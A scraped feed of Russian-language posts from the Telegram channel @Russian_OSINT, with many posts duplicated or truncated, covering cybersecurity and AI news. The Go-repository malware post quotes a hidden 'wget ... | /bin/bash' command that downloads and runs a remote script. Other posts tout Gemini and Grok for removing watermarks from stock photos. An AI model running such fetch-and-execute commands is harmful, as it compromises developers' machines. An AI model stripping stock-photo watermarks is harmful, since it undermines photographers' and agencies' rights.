1️⃣ В новой бесплатной модельке 🌐 Gemini 2.0 Flash (Image Generation) Experimental можно убирать водяные знаки со стоковых фотографий (пример Shutterstock). Достаточно попросить в окне промпта —
2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в🟦 Photoshop. Достаточно загрузить изображение и попросить сделать визуальные изменения, регулируя 🥵 temperature (отвечает за креативность ответов).
3️⃣ Можно менять фон (🤥 котик) или убирать предметы (пример с ✈️самолетом).
✋ @Russian_OSINT
remove watermarks from this image.2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в
3️⃣ Можно менять фон (
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4
kaspersky_ics_cert_threat_landscape_for_industrial_automation_systems.pdf
6.1 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
Как рассказали ТАСС в
Мошенники могут звонить под предлогом проверки качества связи якобы от оператора, предлагать услуги или товары, проводить мнимые опросы. При этом человеку задают вопросы, а он на них отвечает. Задача мошенников заполучить запись голоса абонента с ключевым словом ⚠️"да", - говорится в материалах.
====
В связи с появившейся схемой мошенничества в МВД призвали к осторожности при звонках с неизвестных номеров. Если их избежать не удалось, то лучше следить за своей речью и не произносить "ключевые фразы" и не говорить "да", советуют в ведомстве. "Лучше сразу же завершить такой разговор", - говорится в материалах киберполиции.
Please open Telegram to view this post
VIEW IN TELEGRAM
Республиканцы из Комитета по внутренней безопасности Палаты представителей требуют от
По данным разведки США, Volt Typhoon якобы в течение как минимум 5 лет взламывали системы КИИ и объекты гражданской инфраструктуры. Разговоры снова не обошли стороной телеком:
Якобы китайские хакеры могли даже прослушивать разговоры высокопоставленных чиновников, включая президента США Дональда Трампа и Джей Ди Вэнса.
Комитет по национальной безопасности выразил обеспокоенность тем, что администрация Байдена не обеспечила достаточную прозрачность в расследовании этих атак. Законодатели также требуют от DHS предоставить информацию о том, когда именно CISA впервые узнала о группах Volt Typhoon и Salt Typhoon, а также хронологию ответных действий в отношении хакеров. Все необходимые документы DHS должны быть переданы комитету до 31 марта 2025 года.
Please open Telegram to view this post
VIEW IN TELEGRAM
В сообществе Go-разработчиков случился неприятный инцидент. Представители популярного проекта Atlas заметили, что злоумышленники "клонировали" один из их репозиториев на GitHub (GORM Provider), накрутили ⭐️ звёзды с помощью фейковых аккаунтов и
Поддельный репозиторий —
.]com/readyrevena/atlas-provider-gorm (удалён) содержал скрытый код, загружающий и исполняющий вредоносный Bash-скрипт с удалённого сервера через команду:
wget -O - https://reque***ne.fun/storage/de373d0df/a31546bf | /bin/bash &
Ззлоумышленники потенциально могут выполнить код на машине разработчика: установить вредоносное ПО, шпионские программы или
https://github.com/esteemedpar/guetzli-go (удалено)
https://github.com/closeddigit/macos-totp-cli (удалено)
https://github.com/frillymacaro/ai-search4ai-go (удалено)
и множество других.
Замечены вредоносные клоны: kubernixos, shelly-bulk-update, terraform-provider-atlas, gonet.
Ещё проблема состоит в том, что Go-разработчики часто устанавливают зависимости через
go get <URL>, что делает возможным случайное добавление поддельного пакета в проект. В отличие от экосистемы npm или PyPI, у Go отсутствует централизованный механизм валидации пакетов.1️⃣ Одобрение модулей перед публикацией (Modules Approval Process).
2️⃣ Введение доверенных издателей (Trusted Publishers).
3️⃣ Ограничения на установку неподтвержденных пакетов в go.mod.
4️⃣ Автоматическая проверка пакетов на вредоносный код в Go Proxy.
5️⃣ Более оперативное удаление вредоносных пакетов и форков на GitHub.
6️⃣ Создание инструментов для анализа зависимостей (аналог npm audit).
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🧑🎓🇺🇸 Студенты Стэнфорда устремились в военную сферу, позабыв о Кремниевой долине
Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.
Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.
Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.
Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.
— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.
Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.
— говорит один из студентов Стэнфорда.
Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов👹 извлекать максимальную прибыль из будущих конфликтов, чем реальной необходимостью. Критики также указывают на возможные последствия тесного слияния частного сектора с военными, так как это может привести к геополитической эскалации и глобальной нестабильности.
Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.
✋ @Russian_OSINT
Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.
Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.
Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.
Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.
"США десятилетиями доминировали в мире, но Китай показывает взрывной рост, и теперь мы можем проиграть. Это вопрос экзистенциальный"
— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.
Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.
"Если что-то вспыхнет в Тихоокеанском регионе, то деньги польются рекой, как это было в Ираке и Афганистане"
— говорит один из студентов Стэнфорда.
Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов
Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.
Please open Telegram to view this post
VIEW IN TELEGRAM
Как сообщается на сайт duma.gov.ru, рассмотрение во втором чтении должно быть в приоритетном порядке, подчеркнул в ходе пленарного заседания Председатель ГД Вячеслав Володин. Он сообщил, что оно может состояться уже 25 марта.
Законопроектом, в частности, закрепляется возможность онлайн-обмена информацией между государственными органами, банками и цифровыми платформами. В пояснительной записке к документу отмечено, что автоматический мониторинг позволит практически моментально выявлять подозрительные действия, блокировать их и уведомлять правоохранительные органы о потенциальных преступлениях.
Кроме этого, инициативой:
Предусмотрены и иные нововведения, направленные на защиту от противоправных деяний, совершаемых с использованием информационных технологий. Законопроект объединил около 30 мер борьбы с мошенниками.
Please open Telegram to view this post
VIEW IN TELEGRAM
Вчера решил попробовать протестировать китайского зверя под названием 🇨🇳 Manus.
Многие из вас видели в сети видео, где на столе стоит монитор и ИИ-агент "что-то там делает, управляя 50 аккаунтами в соц.сетях". Якобы это Manus. Нет, друзья, это не Manus. Опроверг сам соучредитель.
— написал Ичао "Пик" Джи.
Manus это ИИ-агент, который ищет как Perplexity в режиме Deep Research или ChatGPT Deep research.
======
Отправил заявку на сайте Manus. Команда проекта буквально в течение 2 часов очень шустро одобрила мне доступ. За оперативность 5+.
Поделюсь пока только общими впечатлениями. Не претендую на истину.
Тестировал в течение одного дня. Даётся возможность сделать 3 глобальных ресерч запроса - так называемые trial tasks. И это бесплатно.
И как? Понравилось? Да, не то слово. Крайне положительные эмоции. Я бы даже сказал🤖 пушка, он же китайский скайнет на минималках.
ИИ-агенту Manus была поставлена классическая маркетинговая задача исследовать рынок в регионах XYZ и оценить потенциал производства продуктов A/Б на ближайшие 5 лет. Промпт примерно на 3000 символов.
📄 Спустя 3 часа поисков в сети Manus выдал на английском мегарепорт на 57 страниц в pdf цифрами, таблицами, расчётами, блекджеком и анализом трендов. Написал оглавление и даже методологию.
Цифры выглядят правдоподобными в отчёте. Часть совпадает с тем, что было исследовано ранее. Проверю остальное на днях. Допускаю, что как и любой другой ИИ-агент он может ошибаться.
Но то что писали в сети ранее с точки зрения критики про Manus (якобы тупит и не даёт источники) — ничего такого не увидел. Может промпт некорректно составили или плохо разъяснили задачу?
С учётом повсеместного информационного шума лучше ручками перепроверять конкретно в рамках своих задач. Например, одному человеку подходит, а другому может не подойти. И наоборот.
В любом случае конкуренция со стороны Китая это большой плюс для нас всех. Пользователи от этого только выигрывают.
Какие есть явные минусы у Manus? Лимит контекста. Пока это главная ахиллесова пята. Разрабы удвоили его недавно, но мне не помогло.
Благодаря начальному промпту получился слишком развернутый ответ в pdf (57 страниц). После основного запроса попросил его ответить на ещё 4 дополнительных запроса в рамках одного таска, чтобы уточнить кое-какие детали, но он заглох. Manus has stopped because the context is too long, please start a new chat. Важно учитывать, что можно легко выйти за "контекст", когда сильно много букав. ИИ-модели не любят много букав читать.
Кстати, пробовал ранее практически идентичный маркетинговый запрос в Perplexity, ChatGPT, Grok и других (режим deep research или deepsearch) — ответы нервно курят в сторонке по сравнению с результатами китайца. Это субъективная точка зрения, но в моем конкретном случае это так. Среди ИИ-агентов/моделей в режиме deep research китайскому Manus смело даю 1 место.
У кого будет желание и возможность — обязательно пробуйте.
Промпт лучше писать на английском, чтобы он вас лучше понимал. Обязательно попросите его искать строго научные/надёжные источники, а не вики и прочее. В моём кейсе Manus выдал качественные научные референсы и аналитические репорты за 2023-2024, как я и просил.
👍 В очередной раз убеждаюсь, что китайские инженеры умеют в уникальные ИИ-продукты.
✋ @Russian_OSINT
Многие из вас видели в сети видео, где на столе стоит монитор и ИИ-агент "что-то там делает, управляя 50 аккаунтами в соц.сетях". Якобы это Manus. Нет, друзья, это не Manus. Опроверг сам соучредитель.
Соучредитель Manus AI здесь! Спасибо за ваш интерес к Manus, но это видео определенно НЕ Manus 🤣. Наш официальный аккаунт — ManusAI_HQ. Manus — это веб-агент ИИ, как OpenAI Operator/DeepResearch, а не VNC для смартфонов.
— написал Ичао "Пик" Джи.
Manus это ИИ-агент, который ищет как Perplexity в режиме Deep Research или ChatGPT Deep research.
======
Отправил заявку на сайте Manus. Команда проекта буквально в течение 2 часов очень шустро одобрила мне доступ. За оперативность 5+.
Поделюсь пока только общими впечатлениями. Не претендую на истину.
Тестировал в течение одного дня. Даётся возможность сделать 3 глобальных ресерч запроса - так называемые trial tasks. И это бесплатно.
И как? Понравилось? Да, не то слово. Крайне положительные эмоции. Я бы даже сказал
ИИ-агенту Manus была поставлена классическая маркетинговая задача исследовать рынок в регионах XYZ и оценить потенциал производства продуктов A/Б на ближайшие 5 лет. Промпт примерно на 3000 символов.
Цифры выглядят правдоподобными в отчёте. Часть совпадает с тем, что было исследовано ранее. Проверю остальное на днях. Допускаю, что как и любой другой ИИ-агент он может ошибаться.
Но то что писали в сети ранее с точки зрения критики про Manus (якобы тупит и не даёт источники) — ничего такого не увидел. Может промпт некорректно составили или плохо разъяснили задачу?
С учётом повсеместного информационного шума лучше ручками перепроверять конкретно в рамках своих задач. Например, одному человеку подходит, а другому может не подойти. И наоборот.
В любом случае конкуренция со стороны Китая это большой плюс для нас всех. Пользователи от этого только выигрывают.
Какие есть явные минусы у Manus? Лимит контекста. Пока это главная ахиллесова пята. Разрабы удвоили его недавно, но мне не помогло.
Благодаря начальному промпту получился слишком развернутый ответ в pdf (57 страниц). После основного запроса попросил его ответить на ещё 4 дополнительных запроса в рамках одного таска, чтобы уточнить кое-какие детали, но он заглох. Manus has stopped because the context is too long, please start a new chat. Важно учитывать, что можно легко выйти за "контекст", когда сильно много букав. ИИ-модели не любят много букав читать.
Кстати, пробовал ранее практически идентичный маркетинговый запрос в Perplexity, ChatGPT, Grok и других (режим deep research или deepsearch) — ответы нервно курят в сторонке по сравнению с результатами китайца. Это субъективная точка зрения, но в моем конкретном случае это так. Среди ИИ-агентов/моделей в режиме deep research китайскому Manus смело даю 1 место.
У кого будет желание и возможность — обязательно пробуйте.
Промпт лучше писать на английском, чтобы он вас лучше понимал. Обязательно попросите его искать строго научные/надёжные источники, а не вики и прочее. В моём кейсе Manus выдал качественные научные референсы и аналитические репорты за 2023-2024, как я и просил.
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Появились новые подробности от Citizenlab и Джона Скотт-Рейлтона по поводу шпионского ПО Graphite от Paragon.
Атака на WhatsApp с использованием шпионского ПО Paragon, известного как Graphite, представляет собой атаку нулевого клика (zero-click), при которой жертве не нужно выполнять никаких действий, чтобы её устройство было взломано. Специалисты Citizenlab утверждают, что атака выглядит примерно следующим образом:
1️⃣ Заражение могло происходить через отправление PDF в WhatsApp-группу. Атакующий добавляет жертву в группу и отправляет вредоносный PDF. Либо жертва и хакер уже находятся в одной группе.
2️⃣ Или заражение могло происходить через личное сообщение с отправлением PDF. Потом сообщение удаляется, якобы случайно кто-то ошибся.
3️⃣ Жертве не требовалось открывать какой-либо
4️⃣ Уязвимость в механизме обработки PDF-документов в WhatsApp могла автоматически приводить к выполнению вредоносного кода.
5️⃣ Шпионское ПО Paragon выходит за пределы изолированной среды Android (sandbox escape) и может заражать другие приложения на устройстве.
🔍Почему Citizenlab убеждены в том, что к этому заражению причастна компания Paragon?
1️⃣ Цепочка инфраструктуры и фингерпринтинг
2️⃣ Методология атаки совпадает с описанными возможностями Graphite
3️⃣ BIGPRETZEL – индикатор заражения Graphite
4️⃣ Признания Paragon и их действия после утечки
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Канал 🔨 SecAtor — @true_secator пишет интересное:
Исследователь Йоханес Нугрохо раскрыл подробности метода взлома для шифрования Akira ransomware и восстановления исходных файлов.
На основе результатов своего исследования разработал дешифратор для Linux-версии Akira, который задействует вычислительную мощность GPU для извлечения ключа дешифрования и разблокировки файлов.
При этом сам метод не универсален и работает только с вариантами Akira 2024.
За разработку дешифратора Йоханес взялся после обращения его друга с просьбой о помощи.
Тогда он рассчитал, что зашифрованную систему можно взломать за неделю, учитывая, что Akira генерирует ключи шифрования с использованием временных меток (в наносекундах).
Но в виду непредвиденных сложностей на это потребовалось три недели и 1200 долларов на аренду мощности графического процессора, которая позволила взломать ключ шифрования.
Дешифратор работает иначе, нежели традиционные инструменты дешифрования.
Он перебирает ключи шифрования (уникальные для каждого файла) в расчете на то, что шифратор Akira генерирует свои ключи шифрования на основе текущего времени в качестве начального числа.
Начальное значение шифрования - это данные, используемые с криптографическими функциями для генерации сильных, непредсказуемых ключей шифрования.
Akira полагается не на один момент времени, а использует четыре, каждый с наносекундным разрешением.
Генерация ключа сложна, включает 1500 раундов SHA-256 для каждой временной метки.
Уровень точности временных меток реализует более миллиарда возможных значений в секунду, что затрудняет подбор ключей с помощью брута.
Кроме того, Akira на Linux шифрует несколько файлов одновременно, используя многопоточность, что затрудняет определение используемой временной метки и еще больше усложняет ситуацию.
Исследователь сузил возможные временные метки, просмотрев файлы журналов, которыми поделился его друг.
Это позволило увидеть, когда была запущена программа-вымогатель, метаданные файла для оценки времени завершения шифрования и создать бенчмарки шифрования на различном оборудовании для создания предсказуемых профилей.
Первые попытки с использованием RTX 3060 были слишком долгими, с потолком всего в 60 млн. тестов шифрования в секунду. Обновление до RTC 3090 тоже не помогло.
В конце концов исследователь обратился к облачным сервисам RunPod и Vast.ai, чтобы подтвердить эффективность своего инструмента.
В частности, он задействовал шестнадцать графических процессоров RTX 4090 для подбора ключа дешифрования примерно за 10 часов.
Однако в зависимости от количества зашифрованных файлов, требующих восстановления, процесс может занять несколько дней.
Исследователь отметил в своей статье, что эксперты по графическим процессорам могут оптимизировать его код, поэтому производительность, вероятно, может быть улучшена.
Дешифратор доступен на GitHub вместе с инструкциями по восстановлению файлов, зашифрованных Akira.
Исследователь Йоханес Нугрохо раскрыл подробности метода взлома для шифрования Akira ransomware и восстановления исходных файлов.
На основе результатов своего исследования разработал дешифратор для Linux-версии Akira, который задействует вычислительную мощность GPU для извлечения ключа дешифрования и разблокировки файлов.
При этом сам метод не универсален и работает только с вариантами Akira 2024.
За разработку дешифратора Йоханес взялся после обращения его друга с просьбой о помощи.
Тогда он рассчитал, что зашифрованную систему можно взломать за неделю, учитывая, что Akira генерирует ключи шифрования с использованием временных меток (в наносекундах).
Но в виду непредвиденных сложностей на это потребовалось три недели и 1200 долларов на аренду мощности графического процессора, которая позволила взломать ключ шифрования.
Дешифратор работает иначе, нежели традиционные инструменты дешифрования.
Он перебирает ключи шифрования (уникальные для каждого файла) в расчете на то, что шифратор Akira генерирует свои ключи шифрования на основе текущего времени в качестве начального числа.
Начальное значение шифрования - это данные, используемые с криптографическими функциями для генерации сильных, непредсказуемых ключей шифрования.
Akira полагается не на один момент времени, а использует четыре, каждый с наносекундным разрешением.
Генерация ключа сложна, включает 1500 раундов SHA-256 для каждой временной метки.
Уровень точности временных меток реализует более миллиарда возможных значений в секунду, что затрудняет подбор ключей с помощью брута.
Кроме того, Akira на Linux шифрует несколько файлов одновременно, используя многопоточность, что затрудняет определение используемой временной метки и еще больше усложняет ситуацию.
Исследователь сузил возможные временные метки, просмотрев файлы журналов, которыми поделился его друг.
Это позволило увидеть, когда была запущена программа-вымогатель, метаданные файла для оценки времени завершения шифрования и создать бенчмарки шифрования на различном оборудовании для создания предсказуемых профилей.
Первые попытки с использованием RTX 3060 были слишком долгими, с потолком всего в 60 млн. тестов шифрования в секунду. Обновление до RTC 3090 тоже не помогло.
В конце концов исследователь обратился к облачным сервисам RunPod и Vast.ai, чтобы подтвердить эффективность своего инструмента.
В частности, он задействовал шестнадцать графических процессоров RTX 4090 для подбора ключа дешифрования примерно за 10 часов.
Однако в зависимости от количества зашифрованных файлов, требующих восстановления, процесс может занять несколько дней.
Исследователь отметил в своей статье, что эксперты по графическим процессорам могут оптимизировать его код, поэтому производительность, вероятно, может быть улучшена.
Дешифратор доступен на GitHub вместе с инструкциями по восстановлению файлов, зашифрованных Akira.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
SecAtor
Руки-ножницы российского инфосека.
Для связи - mschniperson@mailfence.com
Для связи - mschniperson@mailfence.com
PDF_Analiticheskiy-otchet-po-pentestu-2024.pdf
4.6 MB
👉 Источник: https://rt-solar.ru/upload/iblock/167/nwp1jck6a3smiv3v8jc0uyv33araze5p/PDF_Analiticheskiy-otchet-po-pentestu-2024.pdf
Please open Telegram to view this post
VIEW IN TELEGRAM
🇰🇵Северная Корея делает ставку на ИИ и наступательный киберпотенциал
По данным южнокорейских СМИ Daily NK из 🇰🇷Сеула, КНДР якобы запустила в работу новый исследовательский центр «227» под управлением Генерального разведывательного бюро (ГРБ), пытаясь сосредоточить усилия на разработке наступательных кибертехнологий, включая разработку ИИ-инструментов и ПО для кражи данных/ взлома. По словам источника Daily NK, создание Центра якобы началось 9 марта по прямому указанию Ким Чен Ына. Он будет расположен в районе Мангёндэ, отдельно от основной штаб-квартиры ГРБ в Пхеньяне.
Утверждается, что ключевой задачей центра является разработка технологий для нейтрализации западных систем кибербезопасности, а также создание автоматизированных программ для сбора и анализа информации. Основной упор делается именно на наступательные возможности, а не только сбор разведданных.
Центр будет функционировать круглосуточно 24/7, оперативно реагируя на запросы от хакерских подразделений, действующих за рубежом. Если верить информации источника Daily NK, то КНДР постепенно переходит к более централизованной стратегии ведения информационной войны. В перспективе ожидается полная автоматизация атакующих инструментов с использованием ИИ.
Новому центру для решения своих задач понадобится около 90 высококвалифицированных специалистов, окончивших высшие образовательные учреждения с углублённой подготовкой в области программирования и ИБ. Элитные кадры не будут участвовать в кибероперациях, но сосредоточатся на разработке инструментов для ведения высокотехнологичной кибервойны.
По данным источников, КНДР сделала качественный скачок в киберпространстве за последнее время. Основная ставка делается на ИИ, масштабируемость киберопераций и оперативное реагирование в реальном времени.
✋ @Russian_OSINT
По данным южнокорейских СМИ Daily NK из 🇰🇷Сеула, КНДР якобы запустила в работу новый исследовательский центр «227» под управлением Генерального разведывательного бюро (ГРБ), пытаясь сосредоточить усилия на разработке наступательных кибертехнологий, включая разработку ИИ-инструментов и ПО для кражи данных/ взлома. По словам источника Daily NK, создание Центра якобы началось 9 марта по прямому указанию Ким Чен Ына. Он будет расположен в районе Мангёндэ, отдельно от основной штаб-квартиры ГРБ в Пхеньяне.
Утверждается, что ключевой задачей центра является разработка технологий для нейтрализации западных систем кибербезопасности, а также создание автоматизированных программ для сбора и анализа информации. Основной упор делается именно на наступательные возможности, а не только сбор разведданных.
Центр будет функционировать круглосуточно 24/7, оперативно реагируя на запросы от хакерских подразделений, действующих за рубежом. Если верить информации источника Daily NK, то КНДР постепенно переходит к более централизованной стратегии ведения информационной войны. В перспективе ожидается полная автоматизация атакующих инструментов с использованием ИИ.
Новому центру для решения своих задач понадобится около 90 высококвалифицированных специалистов, окончивших высшие образовательные учреждения с углублённой подготовкой в области программирования и ИБ. Элитные кадры не будут участвовать в кибероперациях, но сосредоточатся на разработке инструментов для ведения высокотехнологичной кибервойны.
По данным источников, КНДР сделала качественный скачок в киберпространстве за последнее время. Основная ставка делается на ИИ, масштабируемость киберопераций и оперативное реагирование в реальном времени.
Please open Telegram to view this post
VIEW IN TELEGRAM
8
Речь идёт о попытке решить острую проблему дефицита
До настоящего времени Nvidia оказывала проекту техническую поддержку, однако теперь становится его полноправным партнёром в совместном проекте, как и компания Маска xAI. Последняя позиционирует себя как альтернатива лидерам рынка вроде OpenAI и уже использует кластер из более чем
Финансовую поддержку ИИ-проекту существенно оказывает 🇦🇪Абу-Даби. Инициативу курирует советник по нацбезопасности шейх Тахнун бин Зайед Аль Нахайян, который недавно встречался с президентом США Дональдом Трампом в Вашингтоне. По его словам, ИИ станет основой будущего.
Если попросить Grok в режиме
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Forwarded from Вестник Киберполиции России
Please open Telegram to view this post
VIEW IN TELEGRAM
Местами Grok показывает результаты лучше, чем гугловская модель.
1️⃣ Позволяет добавлять предметы, людей, животных... 🐻 Например, медведя в лесу.
2️⃣ "Оживляет" старые ЧБ фото. Получается иногда креативно. Закинул ему старое фото. Результаты тестов на скрине.
3️⃣ Отлично справляется также с удалением предметов с картинки. Например, у Маска чёрный галстук убрал.
4️⃣ Водяные знаки (watermarks) с картинок тоже убирает (Adobe Stock).
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM